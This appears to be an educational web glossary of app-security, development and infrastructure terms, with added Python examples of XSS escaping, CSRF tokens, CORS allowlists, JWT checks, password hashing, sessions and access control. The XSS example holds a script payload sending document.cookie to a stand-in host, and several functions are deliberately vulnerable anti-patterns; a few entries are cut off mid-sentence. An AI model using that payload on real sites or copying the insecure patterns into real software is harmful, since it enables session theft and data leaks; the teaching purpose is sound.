Learn

Plain-English explanations of the concepts that matter when building and launching your app.

Security

Cross-Site Scripting (XSS)

An attack where attacker-supplied script is injected into a page your site serves and then runs in other users' browsers with your site's privileges, letting it steal data, read session cookies, or act as the victim. The core defense is escaping untrusted data for the context it is rendered in (HTML text, attribute, URL, or JavaScript).
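Added example (not code from the original page): a vulnerable template beside its escaped form, in Python, using only the standard library. The attacker payload and the comment markup are constructed for the demonstration. It also shows why escaping alone is not enough in a URL attribute, where a "javascript:" scheme carries no special characters and must be allowlisted out.

```python
import html

# Constructed attacker payload for this example (not from the original page).
PAYLOAD = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"


def render_comment_vulnerable(comment):
    # Vulnerable: untrusted text is concatenated straight into the HTML,
    # so a comment containing <script> becomes executable markup.
    return '<p class="comment">' + comment + '</p>'


def render_comment_safe(comment):
    # Escaping for the HTML text context: < > & " ' become entities, so the
    # browser displays the payload as literal text instead of parsing it.
    return '<p class="comment">' + html.escape(comment, quote=True) + '</p>'


def render_link_safe(url):
    # Attribute context. Escaping alone is not enough here: a "javascript:"
    # URL contains nothing html.escape would touch yet still executes when
    # clicked, so the scheme is allowlisted before the value is escaped.
    url = url.strip()
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="' + html.escape(url, quote=True) + '">link</a>'


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_link_safe("javascript:alert(document.cookie)"))
```

Escaping at output time, per context, is what stops XSS; validating input at entry (see Input Validation below) helps but cannot know where the data will later be rendered.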

SQL Injection

An attack where malicious SQL is smuggled in through input fields, letting attackers read, modify, or delete data and in some setups run commands on the database server. Building queries by concatenating user input invites it; parameterized queries (prepared statements) prevent it.

Cross-Site Request Forgery (CSRF)

An attack that tricks a logged-in user's browser into making unwanted requests to your app, like changing their password or transferring money. It works because browsers attach cookies to a request automatically, no matter which site triggered it; anti-CSRF tokens and SameSite cookies are the usual defenses.
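Added example (not code from the original page): a per-session anti-CSRF token checked by a password-change handler, in Python. The session and form are plain dicts standing in for a framework's session store and parsed request body, an assumption made for this example.

```python
import hmac
import secrets


def issue_csrf_token(session):
    # One unguessable token per session; embed it as a hidden field in every
    # form (or a header on every fetch) that changes state.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session, submitted):
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison so response timing does not leak the token.
    return hmac.compare_digest(expected, submitted)


def handle_change_password(session, form):
    # A forged cross-site POST arrives with the victim's session cookie, but
    # the attacker's page cannot read the token bound to that session, so
    # the forged request fails here before anything changes.
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    session["password"] = form["new_password"]
    return 200, "password changed"


def demo():
    session = {"user": "alice"}
    token = issue_csrf_token(session)
    forged = handle_change_password(session, {"new_password": "owned"})
    guessed = handle_change_password(session, {"csrf_token": "guess", "new_password": "owned"})
    legit = handle_change_password(session, {"csrf_token": token, "new_password": "new-pass"})
    return forged[0], guessed[0], legit[0], session["password"]


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with SameSite=Lax (see Session Management below) blocks most cross-site POSTs before they reach the handler; the token remains the defense for the cases SameSite does not cover.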

Broken Access Control

When users can access data or perform actions they shouldn't be allowed to — like viewing other users' data or accessing admin features.

CORS (Cross-Origin Resource Sharing)

A browser mechanism that relaxes the same-origin policy: your API tells the browser which other origins may read its responses. It does not stop requests from being sent (your server still receives and processes them) and it does nothing for non-browser clients, so it is not an access-control mechanism for the API itself.
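Added example (not code from the original page): computing CORS response headers from an origin allowlist, in Python, beside the reflect-any-origin anti-pattern that turns CORS into a data leak. The allowlist and origins are assumed for this example.

```python
# Assumed allowlist of front-end origins for this example.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def cors_headers(request_headers, allow_credentials=True):
    """Response headers to add for one request, based on its Origin header."""
    origin = request_headers.get("Origin")
    if origin is None:
        # Same-origin or non-browser client: CORS does not apply at all.
        return {}
    if origin not in ALLOWED_ORIGINS:
        # No CORS headers: the browser blocks the calling page from reading
        # the response. The request itself still reached the server.
        return {}
    headers = {
        # Echo exactly one allowlisted origin; "*" is not allowed with credentials.
        "Access-Control-Allow-Origin": origin,
        # Tell caches the response varies by Origin.
        "Vary": "Origin",
        "Access-Control-Allow-Methods": "GET, POST, PUT, DELETE",
        "Access-Control-Allow-Headers": "Content-Type, Authorization",
    }
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def cors_headers_insecure(request_headers):
    # Anti-pattern: reflecting whatever Origin arrives, with credentials
    # allowed, lets any website read authenticated responses out of a
    # victim's browser. Scanners flag exactly this misconfiguration.
    return {
        "Access-Control-Allow-Origin": request_headers.get("Origin", "*"),
        "Access-Control-Allow-Credentials": "true",
    }


if __name__ == "__main__":
    print(cors_headers({"Origin": "https://app.example.com"}))
    print(cors_headers({"Origin": "https://evil.example"}))
    print(cors_headers_insecure({"Origin": "https://evil.example"}))
```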

Rate Limiting

Restricting how many requests a user or IP address can make to your API in a given time period, preventing abuse and protecting resources.

OWASP Top 10

The ten most critical security risks for web applications, published by the OWASP Foundation (https://owasp.

JWT (JSON Web Token) Security

JWTs are tokens used for authentication and authorization. They carry encoded claims (user id, roles, expiry) plus a signature so the server can check they were not altered. The claims are only base64-encoded, not encrypted, so anyone holding the token can read them, and a verifier must pin the expected algorithm and check expiry rather than trusting what the token says about itself.
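Added example (not code from the original page): a minimal HS256 JWT signer and verifier in Python using only the standard library, written to show the three checks that matter: the algorithm is pinned (so `"alg": "none"` is rejected), the signature is compared in constant time, and `exp` is enforced. Keys and claims are assumed for the example; in production use a maintained JWT library configured the same way.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, key):
    # header.payload are base64url JSON; the signature is HMAC-SHA256 over both.
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + "." + payload
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token, key, now=None):
    """Return the claims if the token is genuine and unexpired, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(payload_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # malformed base64 or JSON, wrong number of parts
        return None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None
    # Pin the algorithm. Trusting header["alg"] is how "alg": "none" and
    # RS256-to-HS256 key-confusion attacks slip past verifiers.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, (header_b64 + "." + payload_b64).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        return None
    return claims


def peek_claims(token):
    # The payload is only base64url-encoded: anyone holding the token reads it.
    return json.loads(b64url_decode(token.split(".")[1]))


if __name__ == "__main__":
    key = b"assumed-server-signing-key"
    token = sign_hs256({"sub": "alice", "role": "user", "exp": int(time.time()) + 600}, key)
    print(token)
    print(peek_claims(token))
    print(verify_hs256(token, key))
```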

Secrets Management

The practice of securely storing, accessing, and rotating sensitive credentials like API keys, database passwords, and encryption keys.

Dependency Audit

Checking the third-party packages your app uses for known security vulnerabilities, outdated versions, and licensing issues.

Authentication

The process of verifying that a user is who they claim to be.

Authorization

The process of determining what actions or resources a verified user is allowed to access.

OAuth

An open standard protocol that allows users to grant third-party apps limited access to their accounts without sharing their passwords.

API Key Security

Best practices for generating, storing, transmitting, and rotating API keys — the secret tokens that grant access to APIs and third-party services.

Encryption

The process of converting readable data into an unreadable format using mathematical algorithms, so only authorized parties with the correct key can decode it.

Hashing

A one-way mathematical function that converts data into a fixed-size string of characters: the same input always gives the same hash, and the input cannot be recovered from it. Used for integrity checks and for storing passwords, which need a slow, salted algorithm (bcrypt, scrypt, Argon2, or PBKDF2) rather than a fast general-purpose hash like plain SHA-256.
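Added example (not code from the original page): a fast hash for fingerprints beside salted, iterated PBKDF2 for passwords, in Python's standard library. The iteration count is an assumption; tune it so one hash costs tens of milliseconds on your own hardware.

```python
import base64
import hashlib
import hmac
import os

# Assumed PBKDF2-HMAC-SHA256 work factor for this example.
ITERATIONS = 600_000


def sha256_hex(data):
    # Fast hash: right for checksums and fingerprints, wrong for passwords,
    # because an attacker can try billions of guesses per second.
    return hashlib.sha256(data).hexdigest()


def hash_password(password, iterations=ITERATIONS):
    # A random per-user salt defeats precomputed (rainbow) tables and makes
    # identical passwords hash differently; the iteration count makes each
    # guess expensive. The stored string carries everything needed to verify.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password, stored):
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    # Constant-time comparison: a plain == can leak how many bytes matched.
    return hmac.compare_digest(dk, expected)


if __name__ == "__main__":
    print(sha256_hex(b"hello"))
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))
```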

Session Management

The mechanism for maintaining a user's authenticated state across multiple requests.
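Added example (not code from the original page): a server-side session store with a random id, expiry, rotation on login, and a cookie string carrying the attributes that protect the id, in Python. The lifetime and cookie name are assumptions for this example.

```python
import secrets
import time

SESSION_TTL_SECONDS = 8 * 3600  # assumed session lifetime for this example


class SessionStore:
    """Server-side session table keyed by a random, unguessable id."""

    def __init__(self, clock=time.time):
        self.sessions = {}
        self.clock = clock  # injectable so expiry can be tested without waiting

    def create(self, user_id):
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self.sessions[sid] = {"user_id": user_id, "expires": self.clock() + SESSION_TTL_SECONDS}
        return sid

    def get(self, sid):
        session = self.sessions.get(sid)
        if session is None:
            return None
        if self.clock() >= session["expires"]:
            self.sessions.pop(sid, None)  # expired ids stop working server-side
            return None
        return session

    def rotate(self, old_sid):
        # Issue a fresh id after login or any privilege change, so an id an
        # attacker planted in the browser beforehand (session fixation) is useless.
        session = self.sessions.pop(old_sid, None)
        if session is None:
            return None
        return self.create(session["user_id"])

    def destroy(self, sid):
        # Logout must invalidate on the server, not only clear the cookie.
        self.sessions.pop(sid, None)


def session_cookie(sid):
    # HttpOnly keeps scripts (and therefore XSS) away from the id, Secure keeps
    # it off plain HTTP, SameSite=Lax blocks most cross-site request forgery.
    return "session=%s; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=%d" % (sid, SESSION_TTL_SECONDS)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.rotate(store.create("alice"))
    print(session_cookie(sid))
    print(store.get(sid))
```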

Input Validation

The practice of checking and sanitizing all data received from users or external sources before processing it.

Security Headers

HTTP response headers that instruct browsers to enforce security policies, protecting users from common attacks like cross-site scripting, clickjacking, and MIME-type sniffing. Examples are Content-Security-Policy, X-Frame-Options (or the CSP frame-ancestors directive), X-Content-Type-Options: nosniff, and Strict-Transport-Security.

Content Security Policy (CSP)

An HTTP header that controls which resources (scripts, styles, images, etc.

HTTPS / SSL / TLS

Protocols that encrypt communication between a user's browser and your server, preventing eavesdropping, tampering, and impersonation. SSL is the deprecated predecessor of TLS; modern HTTPS runs on TLS 1.2 or 1.3, and the name SSL survives mostly in phrases like "SSL certificate".

Two-Factor Authentication (2FA)

A security method requiring users to provide two different types of identification before accessing an account — typically something they know (password) and something they have (phone or security key).

Penetration Testing

A simulated cyberattack on your application performed by security professionals to find vulnerabilities before real attackers do.

Zero Trust

A security model based on the principle 'never trust, always verify.'

Role-Based Access Control (RBAC)

A method of restricting system access based on user roles (like admin, editor, viewer) rather than individual user permissions.
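Added example (not code from the original page) covering Broken Access Control, Authorization and RBAC together: a role-to-permission table plus the object-level ownership check that role checks alone do not give you, in Python. The roles, permissions and invoice records are constructed sample data.

```python
# Constructed sample data for this example (not from the original page).
ROLE_PERMISSIONS = {
    "viewer": {"invoice:read"},
    "editor": {"invoice:read", "invoice:update"},
    "admin": {"invoice:read", "invoice:update", "invoice:delete", "user:manage"},
}

INVOICES = {
    101: {"owner": "alice", "total": 40},
    102: {"owner": "bob", "total": 99},
}


def has_permission(user, permission):
    # Role check: what this kind of user may do at all. Unknown roles get nothing.
    return permission in ROLE_PERMISSIONS.get(user["role"], set())


def get_invoice_broken(user, invoice_id):
    # Broken access control: being logged in is treated as enough. Any user
    # can walk the ids (101, 102, ...) and read other people's invoices; this
    # is the classic insecure direct object reference (IDOR).
    return INVOICES.get(invoice_id)


def get_invoice(user, invoice_id):
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return 404, None
    if not has_permission(user, "invoice:read"):
        return 403, None
    # Object-level check: a role permission says you may read invoices, not
    # that you may read this one. Admins are the deliberate exception.
    if invoice["owner"] != user["name"] and user["role"] != "admin":
        return 404, None  # same answer as "does not exist", so ids are not confirmed
    return 200, invoice


def delete_invoice(user, invoice_id):
    if invoice_id not in INVOICES:
        return 404
    if not has_permission(user, "invoice:delete"):
        return 403
    del INVOICES[invoice_id]
    return 204


if __name__ == "__main__":
    alice = {"name": "alice", "role": "viewer"}
    print(get_invoice_broken(alice, 102))  # leaks bob's invoice
    print(get_invoice(alice, 102))         # (404, None)
    print(get_invoice(alice, 101))         # (200, {...})
```

Every handler that takes an id must perform the ownership check on the server; hiding links in the UI or trusting an id the client sends is exactly what this category of bug looks like.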

Data Breach

An incident where unauthorized individuals gain access to confidential data, such as user information, credentials, or financial records.

Supply Chain Attack

A cyberattack that targets your application by compromising a third-party dependency, tool, or service that your app relies on — rather than attacking your code directly.

Web Application Firewall (WAF)

A security layer that monitors, filters, and blocks malicious HTTP traffic to and from a web application.

DDoS Protection

Measures to defend against Distributed Denial-of-Service attacks, where attackers flood your application with massive amounts of traffic to overwhelm and crash it.

Token Security

Best practices for creating, storing, transmitting, and invalidating the tokens (JWTs, API keys, session tokens) that control access to your application and its data.

Development

Technical Debt

The accumulated cost of shortcuts, quick fixes, and deferred quality improvements in your codebase.

CI/CD (Continuous Integration / Continuous Deployment)

Automated pipelines that test your code when you push changes (CI) and deploy it to production automatically when tests pass (CD).

Test Coverage

The percentage of your code that is executed by automated tests.

Code Review

The practice of having another person (or service) examine your code for bugs, security issues, and quality problems before it goes to production.

Error Handling

The practice of anticipating, catching, and gracefully managing errors in your application so users see helpful messages instead of crashes or blank screens.

Vibe Coding

Building software by describing what you want to an AI tool and letting it generate the code — without deeply understanding the code yourself.

API Design

The practice of planning and structuring the endpoints, data formats, authentication, and conventions of an Application Programming Interface so it's consistent, intuitive, and maintainable.

REST API

Representational State Transfer — an architectural style for building APIs that uses standard HTTP methods and URLs to perform operations on resources.

GraphQL

A query language for APIs that lets clients request exactly the data they need in a single request.

WebSockets

A communication protocol that provides full-duplex, persistent connections between a client and server, enabling real-time data exchange without repeated HTTP requests.

Server-Side Rendering (SSR)

A technique where web pages are generated on the server for each request, sending fully formed HTML to the browser.

Static Site Generation (SSG)

A technique where web pages are pre-built at build time and served as static HTML files.

Microservices

An architectural pattern where an application is built as a collection of small, independent services that each handle one business capability and communicate via APIs.

Monorepo

A single version control repository that contains multiple distinct projects, packages, or services.

Design Patterns

Reusable solutions to commonly occurring problems in software design.

Dependency Injection

A design pattern where a component receives its dependencies from the outside rather than creating them internally.

State Management

The approach to storing, updating, and sharing data across your application's components.

Component Architecture

The strategy for breaking a user interface into reusable, self-contained components and defining how they interact, compose, and share data.

Type Safety

The degree to which a programming language or tool prevents type errors — like passing a number where a string is expected.

Linting

Automated static analysis of source code to find programming errors, bugs, stylistic issues, and suspicious patterns before the code runs.

Git Workflow

A defined strategy for how a team uses Git branches, commits, code reviews, and merges to manage code changes.

Code Splitting

A technique that breaks your JavaScript bundle into smaller chunks that are loaded on demand, reducing initial page load time by only sending the code needed for the current page.

Tree Shaking

A build optimization that eliminates unused code (dead code) from your JavaScript bundle by analyzing import/export statements and removing anything that isn't actually used.

Hot Module Replacement (HMR)

A development feature that updates code in the browser instantly when you save a file, without requiring a full page reload.

Progressive Web App (PWA)

A web application that uses modern web technologies to deliver an app-like experience, including offline functionality, push notifications, and the ability to install on a user's home screen.

Serverless Functions

Individual functions that run on-demand in the cloud without you managing servers.

Infrastructure

Environment Variables

Configuration values stored outside your code that change between environments (development, staging, production).

Staging Environment

A copy of your production environment used for testing changes before they go live.

Caching

Storing frequently accessed data closer to where it's needed so it doesn't have to be computed or fetched from the database every time.

CDN (Content Delivery Network)

A network of servers worldwide that serves your static content (images, CSS, JavaScript) from locations close to your users, making your site load faster.

API Gateway

A single entry point for all API requests that handles authentication, rate limiting, routing, and monitoring before requests reach your backend services.

Load Balancing

Load balancing distributes incoming traffic across multiple servers so no single server gets overwhelmed.

Auto-Scaling

Auto-scaling automatically adds or removes server capacity based on current demand.

Database Indexing

A database index is a data structure that speeds up queries by letting the database find rows without scanning the entire table.

Connection Pooling

Connection pooling maintains a cache of open database connections that your app reuses instead of opening a new one for every request.

Message Queues

A message queue is a buffer that holds tasks or events so they can be processed asynchronously by worker services.

Monitoring & Observability

Monitoring tracks whether your system is healthy; observability lets you understand why it isn't when something goes wrong.

Logging

Logging is the practice of recording events, errors, and state changes from your application so you can review what happened after the fact.

Backup & Recovery

Backup and recovery is the practice of regularly copying your data to a safe location and having a tested process to restore it.

Blue-Green Deployment

Blue-green deployment runs two identical production environments — one live (blue) and one staging the next release (green).

Docker Containers

Docker containers package your application and all its dependencies into a single portable unit that runs the same way on any machine with a compatible container runtime.

Kubernetes

Kubernetes is an open-source system for automating the deployment, scaling, and management of containerized applications across a cluster of machines.

DNS Management

DNS (Domain Name System) translates human-readable domain names like app.

SSL Certificates

An SSL/TLS certificate proves your website's identity and enables encrypted HTTPS connections.

Infrastructure as Code

Infrastructure as Code (IaC) means managing servers, databases, and cloud resources through version-controlled configuration files instead of manual clicks in a dashboard.

Feature Flags

Feature flags are toggles in your code that let you enable or disable features at runtime without deploying new code.

A/B Testing

A/B testing (split testing) shows different versions of a feature to different user groups simultaneously and measures which performs better.

Database Migration

A database migration is a versioned, incremental change to your database schema — adding a column, creating a table, or modifying indexes.

Edge Computing

Edge computing runs code on servers physically close to your users around the world, rather than in a single central data center.

Cron Jobs

Cron jobs are scheduled tasks that run automatically at defined time intervals — every hour, every day at midnight, every Monday morning.